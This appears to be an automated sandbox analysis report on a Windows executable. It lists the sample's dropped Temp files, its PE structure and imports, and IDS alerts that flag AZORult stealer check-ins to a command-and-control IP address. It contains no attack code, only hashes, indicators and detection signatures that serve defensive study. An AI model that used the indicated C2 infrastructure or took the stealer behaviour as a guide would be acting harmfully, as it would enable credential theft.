                                  Preview:...ZPRXZIK]N.M2.TZRRXZM.RT1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2STZ.BXTR.[...L~.u...03>k"<^,?S?t7'!,z/.r<D%mG<0? r.3#x`C;oz2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2..ZR.Y_MR...KM2RTZRR.Z..YO3RM.STZvRXZMKR.JM2BTZR.YZMK.N1[M2RVZRVXZMKRN1OM2RTZRRXZOKRJ1KM2RTXRRXZM[RNqKM2RDZRBXZMKRN!KM2RTZRRXZMK.O1.J2RTZRRXZMKRN1KM2RTZRRXZMKRN.JMnATZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZM...tKM2R..SRXJMKR.0KM6RTZRRXZMKRN1KM.RT:....MKRN]MM2R.[RRPZMK.O1KM2RTZRRXZMK.N1..a.TZRRX.EKRN.JM2RTZR.YZMKRN1KM2RTZRRXZ.e;*P?,2R.]RRX.LKRF1KM.STZRRXZMKRN1KMrRT.| =6"(RNmXM2R.[RRLZMK.O1KM2RTZRRXZMK.N1.M2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXJOKRN1KM.STZRRXZMKRN1KMrRT.RRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMKRN1KM2RTZRRXZMK

                                  C:\Users\user\AppData\Local\Temp\aut31FB.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):91282
                                  Entropy (8bit):7.974690579511391
                                  Encrypted:false
                                  SSDEEP:1536:ieZ1td8Ec+XmohKalLRoBholpMa60M9VPviv7hVWWLqevKcnbBdVGmZulE:zVxFXXhKalWYP1WZviv77W4KSFuu
                                  MD5:B0FF44571856D6A47D4190914963470C
                                  SHA1:459B3EA04D9ED689F71BDDFEB761E272DAA0696A
                                  SHA-256:ED73E205A860919225D097A753EBD8FF234994CFBE56CEFE5AA1FC344CACE85A
                                  SHA-512:BCC8DD04C878D4B1D4757DC6DE7A9B8240867144FC4FD635C758EB2CFEE1ED59A55BA8BE897ADC7299BBA69E5626B4723720714D0370A6FBF11209D4BFDE56AD
                                  Malicious:false
                                  Preview:EA06...... ...J.Z....v.2.U+U ....U&4.l....]J....T.E..T...x8..~..y\(4.g>....d..?.M...e._..O(.[m.y0...P....`.........?.=.DkU(.f.M.C!....n+\>Uf.3.Su@.%......*.2....*..y..Lk`..Z.R..%....}..J.i.`.........Z.P..q!.....1..)~.*.n.......*....9.:.b..<u...l....T....N....k....R.T...u<.k...1p....>..@.O.(.{.j.......U...eR.W@..U2.R....j....r.U3W...m".T.......x)..........4.x.~>...$(.S.X....*.(.j.O....`.{...;.:.:cJ..%r....Z....N.E..V.Q..S".K....K....P..J.;......k..F....f./.Xd.i..k.C@!..(..5............r.d..*......._.3..m.1*.v3..I*...6.....]<...n..)|o...b.....n..z.B......b..k\l^..a.C&]....~......)..\.]...p..)}.w:.i.......z.B.\_......k]....U.D..^./F...]...[...<.o6.4.x.8..0 ....3".x.t..3......3\.x.4..:l.....}.....q....v....Ue.z..i..q.,|&..<t....n|@.....[KG{..i..l...l ..5x .Lb1@..z;..}!T.../.N...m.qN...\.o.%...k..\2+..`~.:.N...........r]..N..q*}.E...I....f...a8......T3=.......r...Y..I....N!....Q..f.^..............v....8.......'..-{.G.g..{%..\.YxL.....]..W..

                                  C:\Users\user\AppData\Local\Temp\aut321B.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):43582
                                  Entropy (8bit):7.820121629395409
                                  Encrypted:false
                                  SSDEEP:768:P/WdWZiqMol8r/mGmerWFkwAEPrGGihSdAkxRtWDZ9ySMts6SGYpp:PeoZdMhLC6rICSdNxR4FUs6Kpp
                                  MD5:91FE6F30B3BC9D9E2BBC2F7533907999
                                  SHA1:00D14C20216ACB00588AD59FDF6C9131FFA49002
                                  SHA-256:111B5A942AB41F03662697599B3A4FDA2FA629A158D6CF629BBF21B2C5F29E67
                                  SHA-512:C2C035EEF0E0C03B4C5B060E043FBAE1BF56FC516BF171342798E9B448F3647621FD2CC8C88310AB0ADB039D3712F5D39AAFC5BF7B0284A4B61125DDF14EEBC5
                                  Malicious:false
                                  Preview:EA06..P...(.y.^g5.L....6.P..Z..gJ..).9.6m5.M.ty..6..s...eN..(..d.aL..)`...3...sz..eT.?&sj\.eP..).9..g0.....eNg6.*+S9..g9...I...0.L.)...9.L..Y.....).9.D.i.?k.9...B..+....6.R.s...mA.L.Si..g7.L.T...3.R..*X..L.i@.@.P....6....qU.L..9.@.(..X..m\..fUI........9.*g4.....Nm1..+S9.fg6...p.j..y.9...&g6...%...sU..*.i...E.L.i.fm1.L..I.....o(...D.2....p...0..|.P......T...3..&s:..d.............0...4....a....!....fUfs*..}B...6..`..R.. .lR..J..sN...`.2cL.3&.P.........j..aUfs...r.2T.sZ...4.M....>g6.K). ....2U@!......L......E...8E..............0.Z.......'.sG..).i.@.5.}&Ty....M.t..j..mP@65C.l.3......Nj.i..AN...3i..9P...s9.....Q.$ ....e......... ...f..i.3.fg8.M........3i..m6....y..CK.Lj`_.....S...h...JU@.*8..Y...39...6.P..j..mN...@....B..Jx..A... ?p.qI...@.`.........-A.M...0..V.L.@AH.y3...Tp.j........XT&s.t.h. Pf.....A...6..r.6.P......M.I..C50.....@4%>g9..)@ll.6........R..j.....L..i..n)..Uh.....U.:....g.YJ<.kK.<.4.T.t.....r..V.,@ J...T...6...@.........p.=B......D...R+@. ..

                                  C:\Users\user\AppData\Local\Temp\prophetesses

                                  Download File
                                  Process:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):86022
                                  Entropy (8bit):4.1788122829966445
                                  Encrypted:false
                                  SSDEEP:1536:Ut1ODIVDKMKKA4PKa4oWUeVVg7kmp5qEXeaSjcyoQ:SMIVcv42oHcDm+EOgg
                                  MD5:FA7E6ED444C613AA118875AE1E02ADF9
                                  SHA1:36B177D785051150B249159B6A5E8C347A6135E1
                                  SHA-256:AA48CB85A03E1DA81574B554D3F4498689CCE04C91712514582F94B012AB73A7
                                  SHA-512:10B0574215E2578B846452378AC99E452351293BF2D8DE651FC7E932C79D5CB1608B56B2D323F17A8ED235264BE18A92117F39D18EDE74A3BD03F6016D215E72
                                  Malicious:false
                                  Preview:30F78W35V35A38R62B65A63J38H31M65F63G63P63V30Y32N30D30F30L30K35V36B35C37Q62T38R36K62P30H30B30E30H30H30S36V36Z38E39S34T35Z38R34B62N39F36E35K30Y30M30Q30K30B30X36X36B38X39F34I64K38Z36A62Z61D37V32O30Z30J30B30K30M30L36Z36E38W39S35T35N38W38U62M38P36V65C30F30W30Z30Y30L30T36R36O38U39J34M35M38S61K62Z39Y36C35W30B30W30F30J30P30I36S36K38C39U34U64E38E63T62Y61H36D63D30C30G30Q30Q30C30E36G36V38Z39E35U35A38M65G62I38Y33P33B30B30F30L30H30O30Q36M36N38K39I34I35N39H30A62X39P33U32A30Y30B30D30Z30R30V36H36V38K39I34J64S39N32D62D61L32A65B30T30X30X30K30R30W36V36U38A39V35R35Q39N34Z62A38O36I34M30J30X30V30U30A30Y36R36F38I39O34I35W39X36D62Z39C36L63X30R30Q30S30O30O30T36T36H38H39G34L64P39U38S62G61A36F63M30V30E30S30A30R30V36C36F38S39Z35C35V39V61P33N33Y63W30P36R36C38B39C34D35W39Y63G62X39H36O65B30B30F30R30X30C30F36G36L38Z39Y38T64H34Y34I66Y66C66T66T66G66A62K61S37Q34E30N30B30M30W30A30U36S36G38E39Y39Z35A34G36V66B66U66N66N66Z66Y62S38K36N34O30J30A30C30I30H30E36I36V38Y39V38U35P34J38K66U66A66E66U66G66V62J39P36U63G30T30G30N30D30O3

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.010275118340917
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:cJX8BV8LYG.exe
                                  File size:1'320'960 bytes
                                  MD5:528d3ef48415f22bd277a9759d83a859
                                  SHA1:4ee7ed36eeaceca51e91952d25136f7260be6eab
                                  SHA256:7c5bd51d549520223a57177f6dde2feea2a8e48077a36d73b1c96701360a68a6
                                  SHA512:1409d17a7d5928e66b930401e04263a81a33623de404687c22824a177b879a6a4079d7256cd7e72433575662f62fea38a2fc9bad60d74ab88e5bf728fee6bd78
                                  SSDEEP:24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8a4YuX0JS44JZjwDPy6q6:GTvC/MTQYxsWR7andJSlZ2Py7
                                  TLSH:3A55D0033791C022FF9B95725B56F6565ABCA912013BFA1F13A40D79BEB01B1163E3A3
                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                  File Icon

                                  Icon Hash:145cfcf8f2e8cc52

                                  Static PE Info

                                  General

                                  Entrypoint:0x420577
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66CBD6F8 [Mon Aug 26 01:14:32 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:948cc502fe9226992dce9417f952fce3

                                  Entrypoint Preview

                                  Instruction
                                  call 00007FE488DB0EF3h
                                  jmp 00007FE488DB07FFh
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007FE488DB09DDh
                                  mov dword ptr [esi], 0049FDF0h
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 0049FDF8h
                                  mov dword ptr [ecx], 0049FDF0h
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007FE488DB09AAh
                                  mov dword ptr [esi], 0049FE0Ch
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 0049FE14h
                                  mov dword ptr [ecx], 0049FE0Ch
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, ecx
                                  lea eax, dword ptr [esi+04h]
                                  mov dword ptr [esi], 0049FDD0h
                                  and dword ptr [eax], 00000000h
                                  and dword ptr [eax+04h], 00000000h
                                  push eax
                                  mov eax, dword ptr [ebp+08h]
                                  add eax, 04h
                                  push eax
                                  call 00007FE488DB359Dh
                                  pop ecx
                                  pop ecx
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  lea eax, dword ptr [ecx+04h]
                                  mov dword ptr [ecx], 0049FDD0h
                                  push eax
                                  call 00007FE488DB35E8h
                                  pop ecx
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, ecx
                                  lea eax, dword ptr [esi+04h]
                                  mov dword ptr [esi], 0049FDD0h
                                  push eax
                                  call 00007FE488DB35D1h
                                  test byte ptr [ebp+08h], 00000001h
                                  pop ecx

                                  Rich Headers

                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x6bda4.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1400000x7594.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0xd40000x6bda40x6be00baf607213699d963fd6ea8782542a63bFalse0.7211150238991889data7.452145471623723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x1400000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0xd45d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                  RT_ICON0xd47000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                  RT_ICON0xd48280x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                  RT_ICON0xd49500xe0bePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9943859283206452
                                  RT_ICON0xe2a100x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.2501330888441973
                                  RT_ICON0xf32380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.30849274752995587
                                  RT_ICON0xfc6e00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.31963955637707947
                                  RT_ICON0x101b680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.3098134152102031
                                  RT_ICON0x105d900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.3566390041493776
                                  RT_ICON0x1083380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.4268292682926829
                                  RT_ICON0x1093e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.49631147540983606
                                  RT_ICON0x109d680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5886524822695035
                                  RT_MENU0x10a1d00x50dataEnglishGreat Britain0.9
                                  RT_STRING0x10a2200x594dataEnglishGreat Britain0.3333333333333333
                                  RT_STRING0x10a7b40x68adataEnglishGreat Britain0.2735961768219833
                                  RT_STRING0x10ae400x490dataEnglishGreat Britain0.3715753424657534
                                  RT_STRING0x10b2d00x5fcdataEnglishGreat Britain0.3087467362924282
                                  RT_STRING0x10b8cc0x65cdataEnglishGreat Britain0.34336609336609336
                                  RT_STRING0x10bf280x466dataEnglishGreat Britain0.3605683836589698
                                  RT_STRING0x10c3900x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                  RT_RCDATA0x10c4e80x33300data1.000338637057387
                                  RT_GROUP_ICON0x13f7e80x84dataEnglishGreat Britain0.75
                                  RT_GROUP_ICON0x13f86c0x14dataEnglishGreat Britain1.25
                                  RT_GROUP_ICON0x13f8800x14dataEnglishGreat Britain1.15
                                  RT_GROUP_ICON0x13f8940x14dataEnglishGreat Britain1.25
                                  RT_VERSION0x13f8a80x10cdataEnglishGreat Britain0.5895522388059702
                                  RT_MANIFEST0x13f9b40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                  Imports

                                  DLLImport
                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                  PSAPI.DLLGetProcessMemoryInfo
                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                  UxTheme.dllIsThemeActive
                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishGreat Britain

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                  2024-08-29T23:42:06.010055+0200TCP2029467ET MALWARE Win32/AZORult V3.3 Client Checkin M1414973080192.168.2.4172.67.128.117
                                  2024-08-29T23:42:06.010055+0200TCP2810276ETPRO MALWARE AZORult CnC Beacon M114973080192.168.2.4172.67.128.117
                                  2024-08-29T23:42:06.268614+0200TCP2029136ET MALWARE AZORult v3.3 Server Response M118049730172.67.128.117192.168.2.4
                                  2024-08-29T23:42:14.381818+0200TCP2029467ET MALWARE Win32/AZORult V3.3 Client Checkin M1414973180192.168.2.4172.67.128.117

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 29, 2024 23:42:04.275348902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:04.280245066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:04.280318022 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:04.280487061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:04.285221100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.009866953 CEST8049730172.67.128.117192.168.2.4
